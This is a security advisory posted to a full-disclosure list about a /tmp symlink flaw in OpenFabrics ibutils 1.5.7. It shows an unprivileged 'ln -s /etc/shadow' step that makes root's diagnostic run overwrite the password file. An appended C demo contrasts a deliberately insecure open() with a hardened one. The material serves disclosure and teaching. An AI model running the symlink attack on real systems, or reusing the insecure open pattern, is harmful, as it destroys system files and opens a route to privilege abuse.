[Full-disclosure] OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
- To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Wed, 06 Mar 2013 18:35:14 +0000 (GMT)
<html><body><div><h2>OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
</h2>
<hr>
<p>3/6/2013<br>
Larry W. Cashdollar<br>
@_larry0
</p>
<p>The InfiniBand diagnostic utility handles files in /tmp insecurely. A
malicious user can clobber root-owned files with common symlink attacks.
</p>
<p><a
href="http://www.openfabrics.org/downloads/ibutils/">http://www.openfabrics.org/downloads/ibutils/</a>
</p>
<p>[nobody@exdb01 tmp]$ ln -s /etc/shadow ibdiagnet.log <br>
[nobody@exdb01 tmp]$ ls -l ibdiagnet.log<br>
lrwxrwxrwx 1 nobody users 11 Mar 6 18:19 ibdiagnet.log -> /etc/shadow<br>
[nobody@exdb01 tmp]$
</p>
The following files are created; I imagine any one of them can be used.
<p>[root@exdb01 tmp]# ls -l /tmp/ibdiagnet*<br>
-rw-r--r-- 1 root root 57611 Mar 6 18:20 /tmp/ibdiagnet.db<br>
-rw-r--r-- 1 root root 830 Mar 6 18:20 /tmp/ibdiagnet.fdbs<br>
-rw-r--r-- 1 root root 5805 Mar 6 18:20 /tmp/ibdiagnet_ibis.log<br>
-rw-r--r-- 1 root root 2359 Mar 6 18:20 /tmp/ibdiagnet.log<br>
-rw-r--r-- 1 root root 7072 Mar 6 18:20 /tmp/ibdiagnet.lst<br>
-rw-r--r-- 1 root root 456 Mar 6 18:20 /tmp/ibdiagnet.mcfdbs<br>
-rw-r--r-- 1 root root 784 Mar 6 18:20 /tmp/ibdiagnet.pkey<br>
-rw-r--r-- 1 root root 3348 Mar 6 18:20 /tmp/ibdiagnet.psl<br>
-rw-r--r-- 1 root root 179228 Mar 6 18:20 /tmp/ibdiagnet.slvl<br>
-rw-r--r-- 1 root root 193 Mar 6 18:20 /tmp/ibdiagnet.sm
</p>
After root runs a diagnostic command:
<p>[root@exdb01 tmp]# ibdiagnet -ls 10 -lw 4x -vlr<br>
Loading IBDIAGNET from: /usr/lib64/ibdiagnet1.5.7<br>
-W- Topology file is not specified.<br>
 Reports regarding cluster links will use direct routes.<br>
Loading IBDM from: /usr/lib64/ibdm1.5.7<br>
-W- A few ports of local device are up.<br>
 Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.<br>
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered.<br>
.<br>
.<br>
.<br>
.<br>
 Extracting SL Based Routing Info 0 0<br>
Please see /tmp/ibdiagnet.log for complete log<br>
-I- Done. Run time was 2 seconds.
</p>
Symlinked files are overwritten:
<p>[root@exdb01 tmp] ls -l /etc/shadow<br>
-rw------- 1 root root 2359 Mar 6 18:17 /etc/shadow<br>
[root@exdb01 tmp] head /etc/shadow<br>
-W- Topology file is not specified.<br>
 Reports regarding cluster links will use direct routes.<br>
-W- A few ports of local device are up.<br>
 Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.<br>
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered.<br>
-I---------------------------------------------------<br>
-I- Bad Guids/LIDs Info
</p>
<h4>Versions installed</h4>
<p>[root@exdb01 tmp] rpm -aq |grep ibutils<br>
ibutils-1.5.7-1.el5<br>
ibutils-libs-1.5.7-1.el5<br>
ibutils-devel-1.5.7-1.el5<br>
[root@exdb01 tmp]
</p></div></body></html>
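The class of bug shown above, as an added example that is not part of the original advisory and is not ibutils code: a file-open pattern that follows a pre-existing symlink, next to a hardened open that refuses it. The function names, the decoy file and the private `mkdtemp()` directory are constructed for the demonstration, and the "naive" flags are an assumption about the pattern, since the advisory does not show the tool's source.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed vulnerable pattern: a symlink already sitting at path is followed
 * and its target is truncated with the caller's privileges. */
int open_log_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: O_EXCL makes open() fail with EEXIST if anything, including a
 * symlink, already exists at path; O_NOFOLLOW is a backstop. */
int open_log_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

static long size_of(const char *p) {
    struct stat st;
    return stat(p, &st) == 0 ? (long)st.st_size : -1;
}

/* Constructed test: a symlink named ibdiagnet.log points at a decoy file.
 * Returns 1 if the safe open refused and left the decoy intact while the
 * naive open truncated it, 0 otherwise, -1 on setup failure. */
int demo(void) {
    char dir[] = "/tmp/symlink-demo.XXXXXX", decoy[64], lnk[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(decoy, sizeof decoy, "%s/decoy", dir);
    snprintf(lnk, sizeof lnk, "%s/ibdiagnet.log", dir);
    FILE *f = fopen(decoy, "w");
    if (!f || fputs("important\n", f) < 0 || fclose(f) != 0) return -1;
    if (symlink(decoy, lnk) != 0) return -1;

    int fd = open_log_safe(lnk);
    int refused = (fd == -1 && errno == EEXIST && size_of(decoy) == 10);
    if (fd >= 0) close(fd);
    fd = open_log_naive(lnk);
    int clobbered = (fd >= 0 && size_of(decoy) == 0);
    if (fd >= 0) close(fd);
    unlink(lnk); unlink(decoy); rmdir(dir);
    return refused && clobbered;
}

int main(void) {
    printf("safe open refused, naive open clobbered: %d\n", demo());
    return 0;
}
```

A privileged tool that must write fixed-name output is safer still when it writes into a directory only root can modify rather than into /tmp.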